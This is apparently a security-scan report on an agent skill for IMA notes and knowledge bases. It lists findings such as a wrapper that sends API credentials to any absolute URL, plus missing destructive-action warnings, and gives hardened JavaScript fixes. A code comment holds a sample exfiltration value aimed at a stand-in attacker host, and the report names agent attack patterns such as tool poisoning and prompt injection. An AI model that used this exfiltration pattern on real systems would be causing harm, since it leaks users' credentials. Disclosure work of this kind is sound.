ima skills (Chinese, condensed version)

Security checks across malware telemetry and agentic risk

Overview

The skill mostly matches its documented purpose (managing IMA notes and knowledge bases), but its generic Node API wrapper sends the user's IMA credentials to whatever host is named when `--path` is given as an absolute URL instead of an API path.

Review this skill before installing it. Use it only with least-privilege IMA credentials, never pass a full URL to the generic ima-api.cjs helper, confirm the target note and knowledge-base IDs before any write or delete, and treat COS temporary credentials as secrets (short-lived does not mean harmless). Prefer the narrower notes and knowledge-base scripts over the generic API wrapper.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • MCP Tool Poisoning: Hidden Instructions, Unicode Deception, Parameter Description Injection
  • Prompt Injection: Instruction Override, Hidden Instructions, Exfiltration Commands
  • Privilege Escalation: Excessive Permissions, Sudo/Root Execution, Credential Access
Findings (17)

Tp4

High
Category
MCP Tool Poisoning
Confidence
91% confidence
Finding
The skill is presented as a note/knowledge-base management tool, but it also exposes a generic API client that can call arbitrary IMA OpenAPI paths via `--path`. That significantly expands capability beyond the declared behavior and can enable unintended data access or state-changing operations if an agent routes user requests into the generic interface without strict allowlisting.

Description-Behavior Mismatch

Medium
Confidence
85% confidence
Finding
The documented interfaces include creation and deletion of knowledge bases, which are broader and more destructive than the top-level description suggests. This can mislead users or orchestrating agents about the skill's write/destructive scope, increasing the risk of accidental administrative actions.

Context-Inappropriate Capability

Medium
Confidence
97% confidence
Finding
The request helper accepts any absolute URL when `apiPath` starts with `http`, bypassing the intended `ima.qq.com` host restriction. Because the same function always attaches the IMA client ID and API key headers, an attacker who can influence `--path` can exfiltrate those credentials to an arbitrary external host and turn the API wrapper into an SSRF-style outbound request primitive. A prefix check on the scheme is not a mitigation; the target must be parsed and its origin compared against the allowed API origin before any credential header is attached.

Description-Behavior Mismatch

Medium
Confidence
93% confidence
Finding
The tool is presented as supporting note and knowledge-base operations, but it accepts an arbitrary --path and forwards any JSON body to the IMA API. That makes the effective capability broader than described and could enable unintended access to other IMA endpoints if the supplied credentials have wider privileges.
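The two findings above describe the same defect: the wrapper decides where to send credentialed requests from a string prefix. The following is an added example, not code from the skill or from IMA, showing the vulnerable shape beside a hardened replacement. The base origin `https://ima.qq.com/`, the helper names, and the header names are assumptions for illustration.

```javascript
// Added example (not the skill's own code): request-target validation for a
// generic API wrapper like ima-api.cjs. IMA_BASE and the header names are
// assumed for illustration.
const IMA_BASE = new URL('https://ima.qq.com/'); // assumed API origin

// Vulnerable shape, as the finding describes it: anything starting with
// "http" is used verbatim, so `--path https://attacker.example/collect` wins
// and the credential headers go to the attacker.
function buildTargetUnsafe(apiPath) {
  return apiPath.startsWith('http') ? apiPath : IMA_BASE.origin + apiPath;
}

// Hardened shape: accept only a path, resolve it against the fixed base, and
// refuse anything whose parsed origin differs from the allowed API origin.
function buildTargetSafe(apiPath) {
  if (typeof apiPath !== 'string' || !apiPath.startsWith('/')) {
    throw new Error('apiPath must be a path on the API host, e.g. /openapi/...');
  }
  // "//host" and "/\host" are parsed as a new authority by WHATWG URL, so a
  // leading-slash check alone would still let the host change.
  if (/^\/[\/\\]/.test(apiPath)) {
    throw new Error('protocol-relative paths are not allowed');
  }
  const target = new URL(apiPath, IMA_BASE);
  if (target.origin !== IMA_BASE.origin) {
    throw new Error(`refusing request to ${target.origin}`);
  }
  return target.href;
}

// Credentials are attached only after the target has passed the origin check.
function buildRequest(apiPath, creds) {
  const url = buildTargetSafe(apiPath);
  return {
    url,
    headers: { 'X-Client-Id': creds.clientId, 'X-Api-Key': creds.apiKey }, // header names assumed
  };
}
```

The origin comparison after parsing is the real control; the regex only gives a clearer error message for the two most common host-changing prefixes.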

Missing User Warnings

Medium
Confidence
90% confidence
Finding
Documenting knowledge-base deletion without any warning or confirmation guidance makes accidental destructive operations more likely, especially in agentic contexts where commands may be inferred from natural language. Data deletion is irreversible or costly to recover, so missing safety interlocks is a real operational security risk.

Missing User Warnings

Medium
Confidence
93% confidence
Finding
The skill instructs users to supply long-lived API credentials via environment variables or config files but gives no warning about keeping them out of shell history, logs, screenshots, or shared terminal output. In an agent or collaborative environment, this omission increases the chance that secrets are accidentally exposed during normal use.

Missing User Warnings

Medium
Confidence
95% confidence
Finding
The manual curl example includes authentication headers carrying API credentials but does not warn that command lines, shell history, process listings, CI logs, and transcripts may capture those values. This can lead to credential leakage and unauthorized API access if users copy the example naively.

Missing User Warnings

High
Confidence
98% confidence
Finding
The upload example explicitly shows passing temporary COS secret_id, secret_key, and token as command-line arguments without any warning about sensitivity. Even though the credentials are temporary, they can still be captured by shell history, process inspection, agent logs, or transcript storage and abused to access or upload objects during their validity window.

Missing User Warnings

Medium
Confidence
92% confidence
Finding
The script writes short-lived COS secrets (secret_id, secret_key, token) to a predictable temporary-directory file on local disk, which creates credential persistence beyond the immediate process. On multi-user systems, shared temp locations, backups, crash dumps, or later local compromise could expose those credentials and allow unauthorized uploads or access within the token lifetime.

Missing User Warnings

Medium
Confidence
92% confidence
Finding
The script silently loads API credentials from environment variables or local config files and immediately uses them to make outbound HTTPS requests, without any user-facing disclosure or confirmation. In an agent-skill context, this can cause users or downstream systems to trigger authenticated remote actions or data access without realizing local secrets will be used.

Missing User Warnings

Medium
Confidence
95% confidence
Finding
The add-urls and add-note commands perform authenticated remote write operations that modify a knowledge base, but they do so without an explicit warning, confirmation, or dry-run safeguard. In an agent-driven workflow, this increases the risk of unintended data import, pollution of shared knowledge bases, or misuse of the user's authenticated access.

Missing User Warnings

Medium
Confidence
94% confidence
Finding
The create operation performs a state-changing write to the user's remote notes account, but the documentation does not clearly warn the user that invoking it will create persistent content. In an agent-skill context, missing a prominent user-facing write warning increases the risk of unintended account modification or surprise data creation when the agent acts on ambiguous prompts.
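The findings on knowledge-base deletion, on add-urls and add-note, and on note creation all ask for the same thing: an interlock that makes state-changing and destructive commands explicit when an agent infers them from natural language. The following is an added example, not the skill's own command handling; the command names and flag spellings are assumptions for illustration.

```javascript
// Added example (not the skill's own code): a confirmation interlock for
// write and delete commands. Command names and flags are assumed.
const DESTRUCTIVE = new Set(['kb-delete', 'note-delete']);
const WRITES = new Set(['kb-create', 'add-urls', 'add-note', 'create', 'append']);

// Decide whether a command may run. Destructive commands need --yes plus a
// --confirm-id that repeats the target id (so the caller has to name what it
// is deleting); writes need --yes; --dry-run always wins and just reports.
// Returns { action: 'run' | 'dry-run' | 'refuse', reason }.
function gate(command, targetId, flags) {
  const yes = flags.includes('--yes');
  const dry = flags.includes('--dry-run');
  const idx = flags.indexOf('--confirm-id');
  const confirmed = idx !== -1 && flags[idx + 1] === targetId;

  if (DESTRUCTIVE.has(command)) {
    if (dry) return { action: 'dry-run', reason: `would ${command} ${targetId}` };
    if (!yes) return { action: 'refuse', reason: `${command} is irreversible; pass --yes` };
    if (!confirmed) return { action: 'refuse', reason: `--confirm-id must equal target id ${targetId}` };
    return { action: 'run', reason: `confirmed ${command} of ${targetId}` };
  }
  if (WRITES.has(command)) {
    if (dry) return { action: 'dry-run', reason: `would ${command} into ${targetId}` };
    if (!yes) return { action: 'refuse', reason: `${command} writes to ${targetId}; pass --yes or --dry-run` };
    return { action: 'run', reason: `writing to ${targetId}` };
  }
  return { action: 'run', reason: 'read-only command' };
}
```

The point of echoing the id rather than just `--yes` is that an agent turning "clean up the old knowledge base" into a command must state exactly which one, which is the check the overview asks for.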

Missing User Warnings

Low
Confidence
85% confidence
Finding
The manual API example shows transmitting API credentials in headers but does not include a privacy/security warning about handling secrets, shell history exposure, log leakage, or safe storage. While header-based authentication over HTTPS is normal, omission of secret-handling guidance in reusable skill docs can lead to accidental credential disclosure by users or downstream tools.

Missing User Warnings

Medium
Confidence
76% confidence
Finding
The script accesses API credentials from environment variables and local files without any user-facing disclosure at runtime. In an agent-skill context, hidden secret access is risky because users may not realize the skill can consume locally available credentials, increasing the chance of unintended account use or trust-boundary violations.

Missing User Warnings

Medium
Confidence
80% confidence
Finding
The skill transmits note content, search queries, document IDs, and appended text to a remote API without an explicit user warning at the point of use. In a note-management context this is expected functionality, but the absence of clear disclosure can still lead to accidental transmission of sensitive content, especially when used through an agent abstraction where network effects may be less visible.

Missing User Warnings

Medium
Confidence
88% confidence
Finding
The script silently reads API credentials from environment variables and ~/.config/ima files without clearly disclosing this behavior to the user. In an agent skill context, hidden credential access is more dangerous because users may invoke the skill for content management without realizing local secrets will be consumed.

Missing User Warnings

Medium
Confidence
90% confidence
Finding
The tool transmits request bodies and authentication headers to a remote service, but the user-facing interface shown here does not clearly warn that provided content and loaded credentials will be sent over the network. In a skill environment handling notes, uploads, and knowledge-base data, this can expose sensitive user content unexpectedly.

VirusTotal

No vendor flagged this skill: 64/64 reported it clean.